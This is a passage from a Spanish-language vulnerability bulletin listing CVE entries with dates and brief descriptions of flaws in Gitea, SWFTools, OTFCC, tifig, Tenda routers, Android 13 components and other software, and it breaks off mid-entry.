    En Gitea versiones anteriores a 1.16.9, era posible que usuarios añadieran incidencias existentes a los proyectos. Debido a controles de acceso inapropiados, un atacante podía asignar cualquier incidencia a cualquier proyecto en Gitea (no había comprobación de permisos para obtener la incidencia). Como resultado, el atacante podía acceder a títulos de las incidencias privadas.
  • Vulnerabilidad en el repositorio de GitHub cockpit-hq/cockpit (CVE-2022-2818)
    Severidad: Pendiente de análisis
    Fecha de publicación: 15/08/2022
    Fecha de última actualización: 02/08/2023
    Una Omisión de Autenticación por Debilidad Primaria en el repositorio de GitHub cockpit-hq/cockpit versiones anteriores a 2.2.2.
  • CVE-2022-37438
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 21/07/2023
    En las versiones de Splunk Enterprise de la siguiente tabla, un usuario autenticado puede diseñar un panel de control que podría filtrar información (por ejemplo, nombre de usuario, correo electrónico y nombre real) sobre los usuarios de Splunk, cuando es visitado por otro usuario por medio del componente drilldown. La vulnerabilidad requiere el acceso del usuario para crear y compartir cuadros de mando usando Splunk Web.
  • CVE-2022-35110
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que el commit 772e55a2 de SWFTools contiene una pérdida de memoria por medio del archivo /lib/mem.c.
  • CVE-2022-35109
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que el commit 772e55a2 de SWFTools contenía un desbordamiento del búfer de la pila por medio de la función draw_stroke en el archivo /gfxpoly/stroke.c.
  • CVE-2022-35108
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que el commit 772e55a2 de SWFTools contenía una violación de segmentación por medio de la función DCTStream::getChar() en el archivo /xpdf/Stream.cc.
  • CVE-2022-35106
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que el commit 772e55a2 de SWFTools contenía una violación de segmentación por medio de la función FoFiTrueType::computeTableChecksum(unsigned char*, int) en el archivo /xpdf/FoFiTrueType.cc.
  • CVE-2022-35105
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que el commit 772e55a2 de SWFTools contiene un desbordamiento del búfer de la pila por medio de /bin/png2swf+0x552cea.
  • CVE-2022-35104
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que el commit 772e55a2 de SWFTools contenía un desbordamiento del búfer de la pila por medio de la función DCTStream::reset() en el archivo /xpdf/Stream.cc.
  • CVE-2022-35101
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que el commit 772e55a2 de SWFTools contiene una violación de segmentación por medio del archivo /multiarch/memset-vec-unaligned-erms.S.
  • CVE-2022-34259
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 21/07/2023
    Adobe Commerce versiones 2.4.3-p2 (y anteriores), 2.3.7-p3 (y anteriores) y 2.4.4 (y anteriores) están afectadas por una vulnerabilidad de Control de Acceso Inapropiado que podría resultar en una omisión de la funcionalidad de Seguridad. Un atacante podría aprovechar esta vulnerabilidad para afectar a la disponibilidad de una característica menor de un usuario. No es requerida una interacción del usuario para la explotación de este problema.
  • CVE-2021-45454
    Severidad: Pendiente de análisis
    Fecha de publicación: 17/08/2022
    Fecha de última actualización: 08/08/2023
    Ampere Altra versiones anteriores a SRP 1.08b y Altra Max versiones anteriores a SRP 2.05, permiten una divulgación de información de telemetría de energía por medio de HWmon.
  • CVE-2022-35485
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que OTFCC versión v0.10.4, contenía una violación de segmentación por medio de /release-x64/otfccdump+0x703969.
  • CVE-2022-35484
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que OTFCC versión v0.10.4, contiene una violación de segmentación por medio de /release-x64/otfccdump+0x6b6a8f.
  • CVE-2022-35483
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que OTFCC versión v0.10.4, contiene una violación de segmentación por medio de /release-x64/otfccdump+0x5266a8.
  • CVE-2022-35476
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que OTFCC versión v0.10.4, contiene una violación de segmentación por medio de /release-x64/otfccdump+0x4fbc0b.
  • CVE-2022-35482
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que OTFCC versión v0.10.4, contenía una violación de segmentación por medio de /release-x64/otfccdump+0x65f724.
  • CVE-2022-35481
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que OTFCC versión v0.10.4, contiene una violación de segmentación por medio del archivo /multiarch/memmove-vec-unaligned-erms.S.
  • CVE-2022-35479
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que OTFCC versión v0.10.4, contenía una violación de segmentación por medio de /release-x64/otfccdump+0x4fbbb6.
  • CVE-2022-35478
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que OTFCC versión v0.10.4, contenía una violación de segmentación por medio de /release-x64/otfccdump+0x6babea.
  • CVE-2022-35477
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que OTFCC versión v0.10.4, contenía una violación de segmentación por medio de /release-x64/otfccdump+0x4fe954.
  • CVE-2022-36152
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que tifig versión v0.2.2, contiene una pérdida de memoria por medio del operador new[](unsigned long) en el archivo /asan/asan_new_delete.cpp.
  • CVE-2022-36153
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que tifig versión v0.2.2, contenía una violación de segmentación por medio de la función std::vector(unsigned int, std::allocator(unsigned int) ): size() const en el archivo /bits/stl_vector.h.
  • CVE-2022-36151
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que tifig versión v0.2.2, contiene una violación de segmentación por medio de la función getType() en el archivo /common/bbox.cpp.
  • CVE-2022-36150
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que tifig versión v0.2.2, contenía un desbordamiento del búfer de la pila por medio de la función __asan_memmove en el archivo /asan/asan_interceptors_memintrinsics.cpp.
  • CVE-2022-35114
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que el commit 772e55a2 de SWFTools contenía una violación de segmentación por medio de la función extractFrame en el archivo /readers/swf.c.
  • CVE-2022-35100
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que el commit 772e55a2 de SWFTools contenía una violación de segmentación por medio de la función gfxline_getbbox en el archivo /lib/gfxtools.c.
  • CVE-2022-35113
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que el commit 772e55a2 de SWFTools contenía un desbordamiento del búfer de la pila por medio de la función swf_DefineLosslessBitsTagToImage en el archivo /modules/swfbits.c.
  • CVE-2022-33939
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    El controlador CENTUM VP / CS 3000 FCS (CP31, CP33, CP345, CP401 y CP451) contiene un problema en el procesamiento de paquetes de comunicación, que puede conllevar a un consumo de recursos. Si es aprovechada esta vulnerabilidad, un atacante puede causar una condición de denegación de servicio (DoS) en la comunicación ADL mediante el envío de un paquete especialmente diseñado al producto afectado.
  • CVE-2022-36273
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Tenda AC9 versión V15.03.2.21_cn, es vulnerable a una inyección de comandos por medio de goform/SetSysTimeCfg.
  • CVE-2022-0996
    Severidad: MEDIA
    Fecha de publicación: 23/03/2022
    Fecha de última actualización: 08/08/2023
    Se encontró una vulnerabilidad en 389 Directory Server que permite que las contraseñas caducadas accedan a la base de datos para causar una autenticación inapropiada
  • CVE-2022-29959
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Emerson OpenBSI versiones hasta 29-04-2022, maneja inapropiadamente el almacenamiento de credenciales. Es un entorno de ingeniería para la línea de RTUs ControlWave y Bristol Babcock. Este entorno proporciona la funcionalidad de control de acceso mediante la autenticación de usuarios y la administración de privilegios. Las credenciales de varios usuarios son almacenan de forma no segura en el archivo SecUsers.ini usando una simple transformación de cadenas en lugar de un mecanismo criptográfico.
  • CVE-2022-36215
    Severidad: Pendiente de análisis
    Fecha de publicación: 17/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que DedeBIZ versión v6, contiene una vulnerabilidad de ejecución de código remota en el archivo sys_info.php.
  • CVE-2022-34294
    Severidad: Pendiente de análisis
    Fecha de publicación: 15/08/2022
    Fecha de última actualización: 08/08/2023
    totd versión 1.5.3, usa un puerto de origen UDP fijo en las consultas ascendentes enviadas a los resolvedores de DNS. Esto permite el envenenamiento de la caché de DNS porque no se presenta suficiente entropía para prevenir ataques de inyección de tráfico.
  • CVE-2022-35147
    Severidad: Pendiente de análisis
    Fecha de publicación: 17/08/2022
    Fecha de última actualización: 08/08/2023
    DoraCMS versiones v2.18 y anteriores, permiten a atacantes omitir la autenticación de inicio de sesión por medio de una petición HTTP diseñada.
  • CVE-2022-35122
    Severidad: Pendiente de análisis
    Fecha de publicación: 17/08/2022
    Fecha de última actualización: 08/08/2023
    Un problema de control de acceso en Ecowitt GW1100 Series Weather Stations versiones anteriores a GW1100B_v2.1.5 incluyéndola, permite a atacantes no autenticados acceder a información confidencial, incluyendo las contraseñas del dispositivo y del WiFi local.
  • CVE-2022-20330
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En Bluetooth, es posible conectar o desconectar dispositivos bluetooth sin que el usuario sea consciente de ello debido a una falta de comprobación de permisos. Esto podría conllevar a una escalada local de privilegios con los privilegios de ejecución User necesarios. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-181962588
  • CVE-2022-20329
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En Wifi, se presenta una posible forma de habilitar Wifi sin permisos debido a una falta de comprobación de permisos. Esto podría conllevar a una escalada local de privilegios sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-183410556
  • CVE-2022-20328
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En PackageManager, se presenta una posible forma de determinar si una aplicación está instalada debido a una falta de comprobación de permisos. Esto podría conllevar a una divulgación de información local sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-184948501
  • CVE-2022-20327
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En Wi-Fi, se presenta una posible forma de recuperar el SSID de WiFi sin permisos de localización debido a una falta de comprobación de permisos. Esto podría conllevar a una divulgación de información local con los privilegios de ejecución User necesarios. Es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-185126813
  • CVE-2022-20326
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En Telephony, se presenta una posible divulgación de los identificadores de la tarjeta SIM debido a una falta de comprobación de permisos. Esto podría conllevar a una divulgación de información local con los privilegios de ejecución User necesarios. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-185235527
  • CVE-2022-20323
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En PackageManager, se presenta una posible divulgación de la instalación de paquetes debido a una falta de comprobación de permisos. Esto podría conllevar a una divulgación de información local con los privilegios de ejecución User necesarios. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-187176203
  • CVE-2022-20322
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En PackageManager, se presenta una posible divulgación de paquetes instalados debido a una falta de comprobación de permisos. Esto podría conllevar a una divulgación de información local sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-187176993
  • CVE-2022-20321
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En Settings, es posible que una aplicación sin permisos pueda leer el contenido de los códigos QR de WiFi debido a una falta de comprobación de permisos. Esto podría conllevar a una divulgación de información local sin ser necesarios privilegios de ejecución adicionales. Es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-187176859
  • CVE-2022-20268
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En RestrictionsManager, se presenta una posible forma de enviar una transmisión que debería estar restringida a las aplicaciones del sistema debido a una omisión de permisos. Esto podría conllevar a una escalada local de privilegios en un dispositivo gestionado por la empresa sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-210468836
  • CVE-2022-20267
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En bluetooth, se presenta una posible forma de activar o desactivar la conexión bluetooth sin el consentimiento del usuario debido a una falta de comprobación de permisos. Esto podría conllevar a una escalada local de privilegios con los privilegios de ejecución User necesarios. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-211646835
  • CVE-2022-20265
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En Settings, se presenta una posible forma de omitir los permisos de restablecimiento de fábrica debido a una omisión de permisos. Esto podría conllevar a una escalada local de privilegios con acceso físico al dispositivo sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-212804898
  • CVE-2022-20263
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En ActivityManager, se presenta una forma de leer el estado del proceso para otros usuarios debido a una falta de comprobación de permisos. Esto podría conllevar a una divulgación de información local del uso de la aplicación con los privilegios de ejecución User necesarios. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-217935264
  • CVE-2022-20262
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En ActivityManager, se presenta una posible forma de comprobar las capacidades de otro proceso debido a una falta de comprobación de permisos. Esto podría conllevar a una divulgación de información local con los privilegios de ejecución User necesarios. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-218338453
  • CVE-2022-20261
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En LocationManager, se presenta una posible forma de obtener información de ubicación debido a una falta de comprobación de permisos. Esto podría conllevar a una divulgación de información local con los privilegios de ejecución System requeridos. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-219835125
  • CVE-2022-20260
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En Phone app, se presenta un posible bloqueo de bucle debido a un agotamiento de recursos. Esto podría conllevar a una denegación de servicio local persistente en la aplicación Teléfono con los privilegios de ejecución User necesarios. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-220865698
  • CVE-2022-20259
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En Telephony, se presenta un posible filtrado de ICCID y EID debido a una falta de comprobación de permisos. Esto podría conllevar a una divulgación de información local sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-221431393
  • CVE-2022-20256
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En Audio HAL, se presenta una posible escritura fuera de límites debido a una condición de carrera. Esto podría conllevar a una escalada local de privilegios con los privilegios de ejecución System necesarios. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-222572821
  • CVE-2022-20255
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En SettingsProvider, es posible leer o cambiar el tono de llamada predeterminado debido a una falta de comprobación de permisos. Esto podría conllevar a una escalada local de privilegios sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-222687217
  • CVE-2022-20254
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En Wi-Fi, se presenta una omisión de permisos. Esto podría conllevar a una escalada local de privilegios desde el usuario invitado sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-223377547
  • CVE-2022-20253
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En Bluetooth, se presenta un posible fallo de limpieza debido a una excepción no capturada. Esto podría conllevar a una denegación de servicio remota en Bluetooth sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-224545125
  • CVE-2022-35198
    Severidad: Pendiente de análisis
    Fecha de publicación: 18/0